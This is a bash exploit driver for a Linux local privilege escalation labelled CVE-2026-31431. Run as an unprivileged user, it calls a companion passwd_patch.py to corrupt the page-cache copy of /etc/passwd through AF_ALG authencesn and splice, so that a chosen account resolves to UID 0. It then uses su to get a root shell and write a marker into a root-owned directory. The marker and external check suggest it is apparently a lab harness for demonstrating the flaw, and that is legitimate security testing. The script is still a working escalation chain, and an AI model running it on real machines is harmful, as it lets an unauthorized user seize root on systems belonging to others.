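#!/usr/bin/env bash
# escalate.sh — runs ON the VM AS the unprivileged actor (lowpriv).
#
# Drives the CVE-2026-31431 page-cache write primitive (passwd_patch.py, kept
# next to this script) to corrupt the cached /etc/passwd page so that <user>
# resolves to UID 0, then uses `su` to obtain a shell with that identity and
# performs a root-only action: writing a marker file into a root-owned
# directory.
#
# Usage: escalate.sh <user> <marker_dir> <marker_name>
#   user         account whose passwd entry passwd_patch.py rewrites
#   marker_dir   root-owned directory the marker is written into
#   marker_name  file name of the marker inside marker_dir
#
# Exit status: the patcher's status if the page-cache patch step fails
# (nothing further is attempted), otherwise the status of the su step. The
# script still does NOT verify that the marker ended up root-owned; that is
# checked from outside the VM.
set -u

USER_NAME="${1:?usage: escalate.sh <user> <marker_dir> <marker_name>}"
MARKER_DIR="${2:?marker dir required}"
MARKER_NAME="${3:?marker name required}"
HERE="$(cd "$(dirname "$0")" && pwd)" || {
  printf '[!] cannot locate script directory for passwd_patch.py\n' >&2
  exit 1
}
MARKER_PATH="$MARKER_DIR/$MARKER_NAME"

printf '[*] actor identity before exploit:\n'
id

printf '[*] corrupting /etc/passwd page cache via AF_ALG authencesn + splice ...\n'
# Abort if the primitive fails instead of blindly carrying on: without the
# corrupted entry the su below is nothing but a failed login attempt.
rc=0
python3 "$HERE/passwd_patch.py" "$USER_NAME" || rc=$?
if (( rc != 0 )); then
  printf '[!] passwd_patch.py exited with rc=%d; aborting\n' "$rc" >&2
  exit "$rc"
fi

printf '[*] /etc/passwd now resolves %s as:\n' "$USER_NAME"
getent passwd "$USER_NAME" || true

# Build the command string for su's shell with %q so that quotes, spaces or
# other metacharacters in the marker path cannot break out of the command
# (the original interpolated the raw path inside single quotes). For ordinary
# paths %q yields a bare or backslash-escaped word that any /bin/sh accepts;
# only non-printable bytes make it fall back to bash-only $'…' syntax.
printf -v marker_q '%q' "$MARKER_PATH"
su_cmd="id; echo 'created-by-unprivileged-actor-via-CVE-2026-31431' > $marker_q; ls -l $marker_q"

# su switches to the uid from the *target* account's passwd entry, which the
# patch above set to 0, so the shell it spawns carries real uid 0. stdin is
# /dev/null so su can never block on a password prompt: if authentication is
# not skipped it simply fails and the rc below is non-zero.
# NOTE(review): su's usual "no password for root" shortcut is keyed on the
# caller's real uid as reported by the kernel, not on the passwd lookup;
# whether the prompt is skipped here presumably depends on what
# passwd_patch.py wrote into the entry's password field — confirm against
# passwd_patch.py before relying on it.
printf '[*] escalating via su and writing root-owned marker ...\n'
rc=0
su "$USER_NAME" -c "$su_cmd" < /dev/null || rc=$?
printf '[*] su step exited with rc=%d\n' "$rc"

printf '[*] done.\n'
exit "$rc"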
